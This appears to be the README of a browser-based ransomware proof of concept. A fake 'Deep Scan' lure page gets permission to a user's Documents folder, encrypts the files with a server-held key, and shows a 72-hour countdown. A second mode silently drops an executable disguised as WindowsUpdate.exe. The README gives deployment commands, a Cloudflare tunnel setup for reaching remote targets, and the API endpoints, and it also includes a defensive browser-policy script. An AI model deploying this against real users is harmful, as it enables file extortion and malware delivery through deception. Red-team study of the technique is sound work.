██████╗██╗ ██████╗ ██╗ ██╗██████╗ ██████╗ ██╗ ██╗ █████╗ ██████╗ ██████╗
██╔════╝██║ ██╔═══██╗██║ ██║██╔══██╗██╔════╝ ██║ ██║██╔══██╗██╔══██╗██╔══██╗
██║ ██║ ██║ ██║██║ ██║██║ ██║██║ ███╗██║ ██║███████║██████╔╝██║ ██║
██║ ██║ ██║ ██║██║ ██║██║ ██║██║ ██║██║ ██║██╔══██║██╔══██╗██║ ██║
╚██████╗███████╗╚██████╔╝╚██████╔╝██████╔╝╚██████╔╝╚██████╔╝██║ ██║██║ ██║██████╔╝
╚═════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝
Browser-based file system abuse via the File System Access API. Red-team demonstration. Chromium only. No software installation, no exploits, pure permission social engineering.
```
┌─────────────────────────────────────────────────────────────┐
│ TARGET                                                      │
│                                                             │
│ visits lure page -> clicks "Start Deep Scan"                │
│                     |                                       │
│                     v                                       │
│ browser asks: "Allow access to Documents?"                  │
│                     |                                       │
│                     v                                       │
│ [ALLOW] -> scanner animation -> files processed             │
│                     |                                       │
│                     v                                       │
│ alert screen shown                                          │
│ 72h countdown + Case ID                                     │
└─────────────────────────────────────────────────────────────┘
                      |
              POST /api/session (AES key)
                      |
┌─────────────────────────────────────────────────────────────┐
│ OPERATOR                                                    │
│                                                             │
│ GET /api/admin -> session log + master key                  │
│ opens /decrypt -> enters token -> selects folder            │
│                     |                                       │
│                     v                                       │
│ files restored                                              │
└─────────────────────────────────────────────────────────────┘
```
Key design: AES-256 key lives server-side only. Target cannot self-recover.
| Mode | Behavior | Use Case |
|---|---|---|
| lock (default) | AES-256-GCM encrypt files in place, show alert screen | File encryption demo |
| drop | Fake scan (always clean), silently write file to folder | Payload delivery demo |
```bash
npm install

# Lock mode
PORT=7654 ADMIN_TOKEN=StrongSecret node server.js

# Drop mode
PORT=7654 MODE=drop \
  PAYLOAD_FILE=/path/to/update.exe \
  PAYLOAD_FILENAME=WindowsUpdate.exe \
  ADMIN_TOKEN=StrongSecret \
  node server.js
```

Expose via Cloudflare Tunnel (required for HTTPS on remote targets):

```bash
cloudflared tunnel --url http://localhost:7654 --no-autoupdate
```

| Variable | Default | Description |
|---|---|---|
| PORT | 3000 | HTTP port |
| ADMIN_TOKEN | 123123 | Recovery console password |
| MODE | lock | lock or drop |
| PAYLOAD_FILE | - | Binary to drop (EXE, DLL...) |
| PAYLOAD_FILENAME | WindowsUpdate.bat | Filename written to disk |
| PAYLOAD_CONTENT | BAT stub | Inline text fallback |
| Method | Path | Auth | Description |
|---|---|---|---|
| GET | / | - | Lure page |
| GET | /decrypt | - | Recovery console |
| GET | /api/config | - | Active mode + payload config |
| POST | /api/session | - | Register session, return AES key |
| GET | /api/admin | X-Admin-Token header | Master key + session log |
```
browser-ransomware-poc/
|-- server.js          Express server (key mgmt, session registry)
|-- public/
|   |-- index.html     Lure page (target-facing)
|   `-- decrypt.html   Recovery console (operator-facing)
|-- master.key         AES-256 master key (auto-generated, gitignored)
|-- sessions.json      Session log (gitignored)
`-- package.json
```
- Node.js 18+
- Chrome / Edge / Opera (Firefox and Safari block showDirectoryPicker)
- cloudflared for HTTPS tunnel (optional but recommended)
| Finding | Severity | Status |
|---|---|---|
| Admin token exposed in URL | High | Fixed: header-only (X-Admin-Token) |
| No input validation on /api/session | Medium | Fixed: bounds + sanitize |
| Missing security headers | Medium | Fixed |
| Timing-unsafe token comparison | Low | Fixed: timingSafeEqual |
| Weak default token | Low | Warned at startup |
| Key file permissions | Low | Fixed: chmod 600 |
- Chromium only (showDirectoryPicker not in Firefox / Safari)
- Single master key per deployment
- HTTPS required for showDirectoryPicker on non-localhost origins
- No rate limiting or DoS protection
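The Chromium-only dependency above is also the defender's lever. The following is an added example, not part of this project: a PowerShell snippet that sets Chrome's and Edge's documented File System Access API policies so that showDirectoryPicker() is refused by default and the "Allow access to Documents?" prompt never reaches the user, while still letting a named internal origin ask. The allow-listed origin is a placeholder.

```powershell
# Added example (not part of this project): Chromium managed policy that refuses
# File System Access API read/write requests by default, so a lure page's
# showDirectoryPicker() call fails before any "Allow access to Documents?" prompt.
# Run elevated. Policy names are Chrome/Edge enterprise policies; the allow-listed
# origin is a placeholder for an internal app that legitimately needs the API.
$Browsers = @(
    'HKLM:\SOFTWARE\Policies\Google\Chrome',
    'HKLM:\SOFTWARE\Policies\Microsoft\Edge'
)
$AllowedOrigins = @('https://intranet.example.internal')   # placeholder origin

foreach ($Base in $Browsers) {
    New-Item -Path $Base -Force | Out-Null

    # 2 = no site may request access; 3 = sites may ask (the browser default)
    Set-ItemProperty -Path $Base -Name 'DefaultFileSystemWriteGuardSetting' -Value 2 -Type DWord
    Set-ItemProperty -Path $Base -Name 'DefaultFileSystemReadGuardSetting'  -Value 2 -Type DWord

    # List-valued policies live in a subkey whose values are named 1, 2, 3, ...
    foreach ($List in 'FileSystemWriteAskForUrls', 'FileSystemReadAskForUrls') {
        $Key = Join-Path $Base $List
        New-Item -Path $Key -Force | Out-Null
        for ($i = 0; $i -lt $AllowedOrigins.Count; $i++) {
            Set-ItemProperty -Path $Key -Name ($i + 1) -Value $AllowedOrigins[$i] -Type String
        }
    }
}
# Confirm the policies at chrome://policy or edge://policy after a browser restart.
```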
- Check Point Research (2026) - Original research on browser-based file system abuse via the File System Access API
- Web Crypto API / File System Access API - W3C / WHATWG specifications
- GSAP - GreenSock Animation Platform
- Plus Jakarta Sans / IBM Plex Mono - Google Fonts
Authorized red-team and educational use only.
